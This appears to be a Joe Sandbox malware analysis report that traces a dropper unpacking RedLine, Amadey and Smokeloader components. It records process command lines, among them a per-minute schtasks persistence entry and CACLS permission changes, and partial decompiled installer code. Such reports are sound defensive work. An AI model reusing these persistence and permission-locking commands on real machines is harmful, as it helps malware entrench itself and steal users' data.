Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 54%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: afCf.exePID: 2360, Parent PID: 2564

General

Target ID:	2
Start time:	20:00:14
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe
Imagebase:	0x400000
File size:	251392 bytes
MD5 hash:	6E870598039CCE621C7BB265AC99BB3F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000003.262775984.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000003.262775984.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000002.00000002.288363449.0000000000857000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 47%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 5164, Parent PID: 3452

General

Target ID:	3
Start time:	20:00:26
Start date:	07/02/2023
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Imagebase:	0x7ff64d2d0000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: nika.exePID: 6036, Parent PID: 2564

General

Target ID:	6
Start time:	20:00:32
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
Imagebase:	0xad0000
File size:	11264 bytes
MD5 hash:	7E93BACBBC33E6652E147E7FE07572A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 82%, ReversingLabs
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 5168, Parent PID: 3452

General

Target ID:	10
Start time:	20:00:34
Start date:	07/02/2023
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
Imagebase:	0x7ff64d2d0000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: xriv.exePID: 1744, Parent PID: 1216

General

Target ID:	11
Start time:	20:00:44
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
Imagebase:	0x1360000
File size:	241664 bytes
MD5 hash:	8BB923C4D81284DAEF7896E5682DF6C6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000B.00000000.315712522.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 81%, ReversingLabs
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: mnolyk.exePID: 1276, Parent PID: 1744

General

Target ID:	12
Start time:	20:00:45
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
Imagebase:	0x980000
File size:	241664 bytes
MD5 hash:	8BB923C4D81284DAEF7896E5682DF6C6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000C.00000002.775069911.0000000000D1A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000C.00000002.774886747.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000C.00000002.775069911.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000C.00000002.775069911.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000C.00000000.318048617.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 81%, ReversingLabs
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 1084, Parent PID: 1276

General

Target ID:	13
Start time:	20:00:46
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
Imagebase:	0x12e0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5176, Parent PID: 1084

General

Target ID:	14
Start time:	20:00:46
Start date:	07/02/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 2376, Parent PID: 1276

General

Target ID:	15
Start time:	20:00:46
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y\|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
Imagebase:	0x1b0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 408, Parent PID: 2376

General

Target ID:	16
Start time:	20:00:46
Start date:	07/02/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 4784, Parent PID: 2376

General

Target ID:	17
Start time:	20:00:50
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Imagebase:	0x1b0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cacls.exePID: 3888, Parent PID: 2376

General

Target ID:	18
Start time:	20:00:50
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "mnolyk.exe" /P "user:N"
Imagebase:	0x1120000
File size:	27648 bytes
MD5 hash:	4CBB1C027DF71C53A8EE4C855FD35B25
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: mnolyk.exePID: 4760, Parent PID: 1064

General

Target ID:	19
Start time:	20:00:50
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Imagebase:	0x980000
File size:	241664 bytes
MD5 hash:	8BB923C4D81284DAEF7896E5682DF6C6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000013.00000002.332316282.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000013.00000000.329538528.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: cacls.exePID: 4788, Parent PID: 2376

General

Target ID:	20
Start time:	20:00:50
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "mnolyk.exe" /P "user:R" /E
Imagebase:	0x1120000
File size:	27648 bytes
MD5 hash:	4CBB1C027DF71C53A8EE4C855FD35B25
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 676, Parent PID: 2376

General

Target ID:	21
Start time:	20:00:51
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Imagebase:	0x1b0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 788, Parent PID: 1276

General

Target ID:	22
Start time:	20:00:51
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
Imagebase:	0x920000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cacls.exePID: 1328, Parent PID: 2376

General

Target ID:	23
Start time:	20:00:51
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "..\4b9a106e76" /P "user:N"
Imagebase:	0x1120000
File size:	27648 bytes
MD5 hash:	4CBB1C027DF71C53A8EE4C855FD35B25
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cacls.exePID: 3712, Parent PID: 2376

General

Target ID:	24
Start time:	20:00:52
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "..\4b9a106e76" /P "user:R" /E
Imagebase:	0x1120000
File size:	27648 bytes
MD5 hash:	4CBB1C027DF71C53A8EE4C855FD35B25
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: mnolyk.exePID: 5100, Parent PID: 1064

General

Target ID:	25
Start time:	20:01:01
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Imagebase:	0x7ff603c50000
File size:	241664 bytes
MD5 hash:	8BB923C4D81284DAEF7896E5682DF6C6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000019.00000002.352687909.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000019.00000000.352170413.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: mnolyk.exePID: 3888, Parent PID: 1064

General

Target ID:	28
Start time:	20:02:00
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Imagebase:	0x980000
File size:	241664 bytes
MD5 hash:	8BB923C4D81284DAEF7896E5682DF6C6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001C.00000000.478665181.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001C.00000002.479520127.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: mnolyk.exePID: 1100, Parent PID: 1064

General

Target ID:	30
Start time:	20:03:00
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Imagebase:	0x980000
File size:	241664 bytes
MD5 hash:	8BB923C4D81284DAEF7896E5682DF6C6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001E.00000002.607631806.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001E.00000000.607288773.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: mnolyk.exePID: 5124, Parent PID: 1064

General

Target ID:	31
Start time:	20:04:00
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Imagebase:	0x980000
File size:	241664 bytes
MD5 hash:	8BB923C4D81284DAEF7896E5682DF6C6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001F.00000000.735906035.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001F.00000002.736447784.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: file.exePID: 1216, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	26.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	29.6%
Total number of Nodes:	968
Total number of Limit Nodes:	41

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00EB202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185
registrylibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00EB202A(struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t36;
				long _t41;
				struct HINSTANCE__* _t46;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				signed int _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 =  *0xeb8004; // 0x92ae1240
				_v8 = _t28 ^ _t93;
				_t84 = 0x104;
				memset( &_v268, 0, 0x104);
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;
				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
				if(_t36 != 0) {
					L24:
					return E00EB6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
				_t87 = 0;
				while(1) {
					E00EB171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
					if(_t41 != 0) {
						break;
					}
					_t87 = _t87 + 1;
					if(_t87 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t87 != 0xc8) {
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E00EB658A( &_v528, _t84, "advpack.dll");
					_t46 = LoadLibraryA( &_v528); // executed
					_t84 = _t46;
					if(_t84 == 0) {
						L10:
						if(GetModuleFileNameA( *0xeb9a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						_t81 = 0xeb91e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0xeb91e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xeb91e5);
						if(_t90 != 0) {
							 *0xeb8580 = _t66 ^ 0x00000001;
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							if(_t66 == 0) {
								_t54 = "%s /D:%s";
							}
							_push("C:\Users\engineer\AppData\Local\Temp\IXP000.TMP\");
							E00EB171E(_t90, _t84, _t54,  &_v268);
							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							do {
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2
							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
							RegCloseKey(_v532); // executed
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E00EB44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
						goto L17;
					}
					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
					_t66 = 0 | _t91 != 0x00000000;
					FreeLibrary(_t84); // executed
					if(_t91 == 0) {
						goto L10;
					}
					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
						E00EB658A( &_v268, 0x104, 0xeb1140);
					}
					goto L11;
				}
				_t36 = RegCloseKey(_v532);
				 *0xeb8530 = _t66;
				goto L23;
			}

0x00eb202a
0x00eb2035
0x00eb203c
0x00eb2041
0x00eb2050
0x00eb205f
0x00eb2064
0x00eb206f
0x00eb208c
0x00eb2094
0x00eb2257
0x00eb2266
0x00eb2266
0x00eb209a
0x00eb209b
0x00eb209d
0x00eb20aa
0x00eb20af
0x00eb20c9
0x00eb20d1
0x00000000
0x00000000
0x00eb20d3
0x00eb20da
0x00000000
0x00000000
0x00000000
0x00eb20da
0x00eb20e2
0x00eb2103
0x00eb210e
0x00eb2116
0x00eb2122
0x00eb2128
0x00eb212c
0x00eb2179
0x00eb2194
0x00eb21de
0x00eb21e4
0x00eb2256
0x00eb2256
0x00000000
0x00eb2256
0x00eb2196
0x00eb2196
0x00eb219c
0x00eb219f
0x00eb219f
0x00eb21a1
0x00eb21a2
0x00eb21a6
0x00eb21a8
0x00eb21b0
0x00eb21b0
0x00eb21b2
0x00eb21b3
0x00eb21bc
0x00eb21c7
0x00eb21cb
0x00eb21f1
0x00eb21f6
0x00eb21fd
0x00eb21ff
0x00eb21ff
0x00eb2204
0x00eb2213
0x00eb2218
0x00eb221d
0x00eb221d
0x00eb2220
0x00eb2220
0x00eb2222
0x00eb2223
0x00eb2229
0x00eb223d
0x00eb2249
0x00eb2250
0x00000000
0x00eb2250
0x00eb21d2
0x00eb21d9
0x00000000
0x00eb21d9
0x00eb213a
0x00eb2141
0x00eb2144
0x00eb214c
0x00000000
0x00000000
0x00eb2163
0x00eb2172
0x00eb2172
0x00000000
0x00eb2163
0x00eb20ea
0x00eb20f0
0x00000000

APIs

memset.MSVCRT ref: 00EB2050
memset.MSVCRT ref: 00EB205F
RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00EB208C

Part of subcall function 00EB171E: _vsnprintf.MSVCRT ref: 00EB1750

RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00EB20C9
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00EB20EA
GetSystemDirectoryA.KERNEL32 ref: 00EB2103
LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00EB2122
GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00EB2134
FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00EB2144
GetSystemDirectoryA.KERNEL32 ref: 00EB215B
GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00EB218C
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00EB21C1
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00EB21E4
RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00EB223D
RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00EB2249
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00EB2250

Strings

wextract_cleanup0, xrefs: 00EB20A5, 00EB20BE, 00EB20F0, 00EB2232
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00EB21A8, 00EB2204
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00EB21F6
DelNodeRunDLL32, xrefs: 00EB212E
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00EB2082
wextract_cleanup%d, xrefs: 00EB209E
advpack.dll, xrefs: 00EB2109
%s /D:%s, xrefs: 00EB21FF, 00EB2210

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
API String ID: 178549006-607953301
Opcode ID: 91733d59ac8972bbb951e01a03a12cb711a2aae8e24bc13444154e654961bc05
Instruction ID: 47f1fe1ac97e284183fec4196815644a3df1c81c448f7bdeb739d7fe41b8df02
Opcode Fuzzy Hash: 91733d59ac8972bbb951e01a03a12cb711a2aae8e24bc13444154e654961bc05
Instruction Fuzzy Hash: D751D371A01214AFDB20AF65DC49FFB776CEF54700F0412A8FA45F7151EA719D49CA60

Uniqueness

Uniqueness Score: -1.00%

Function 00EB3BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308
libraryloaderCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00EB3BA2() {
				signed int _v8;
				signed int _v12;
				char _v276;
				char _v280;
				short _v300;
				intOrPtr _v304;
				void _v348;
				char _v352;
				intOrPtr _v356;
				signed int _v360;
				short _v364;
				char* _v368;
				intOrPtr _v372;
				void* _v376;
				intOrPtr _v380;
				char _v384;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _v408;
				void* _v424;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t76;
				void* _t77;
				signed int _t79;
				short _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				int _t112;
				void* _t115;
				signed char _t118;
				void* _t125;
				signed int _t127;
				void* _t128;
				struct HINSTANCE__* _t129;
				void* _t130;
				short _t137;
				char* _t140;
				signed char _t144;
				signed char _t145;
				signed int _t149;
				void* _t150;
				void* _t151;
				signed int _t153;
				void* _t155;
				void* _t156;
				signed int _t157;
				signed int _t162;
				signed int _t164;
				void* _t165;

				_t164 = (_t162 & 0xfffffff8) - 0x194;
				_t69 =  *0xeb8004; // 0x92ae1240
				_v8 = _t69 ^ _t164;
				_t153 = 0;
				 *0xeb9124 =  *0xeb9124 & 0;
				_t149 = 0;
				_v388 = 0;
				_v384 = 0;
				_t165 =  *0xeb8a28 - _t153; // 0x0
				if(_t165 != 0) {
					L3:
					_t127 = 0;
					_v392 = 0;
					while(1) {
						_v400 = _v400 & 0x00000000;
						memset( &_v348, 0, 0x44);
						_t164 = _t164 + 0xc;
						_v348 = 0x44;
						if( *0xeb8c42 != 0) {
							goto L26;
						}
						_t146 =  &_v396;
						_t115 = E00EB468F("SHOWWINDOW",  &_v396, 4);
						if(_t115 == 0 || _t115 > 4) {
							L25:
							_t146 = 0x4b1;
							E00EB44B9(0, 0x4b1, 0, 0, 0x10, 0);
							 *0xeb9124 = 0x80070714;
							goto L62;
						} else {
							if(_v396 != 1) {
								__eflags = _v396 - 2;
								if(_v396 != 2) {
									_t137 = 3;
									__eflags = _v396 - _t137;
									if(_v396 == _t137) {
										_v304 = 1;
										_v300 = _t137;
									}
									goto L14;
								}
								_push(6);
								_v304 = 1;
								_pop(0);
								goto L11;
							} else {
								_v304 = 1;
								L11:
								_v300 = 0;
								L14:
								if(_t127 != 0) {
									L27:
									_t155 = 1;
									__eflags = _t127 - 1;
									if(_t127 != 1) {
										L31:
										_t132 =  &_v280;
										_t76 = E00EB1AE8( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
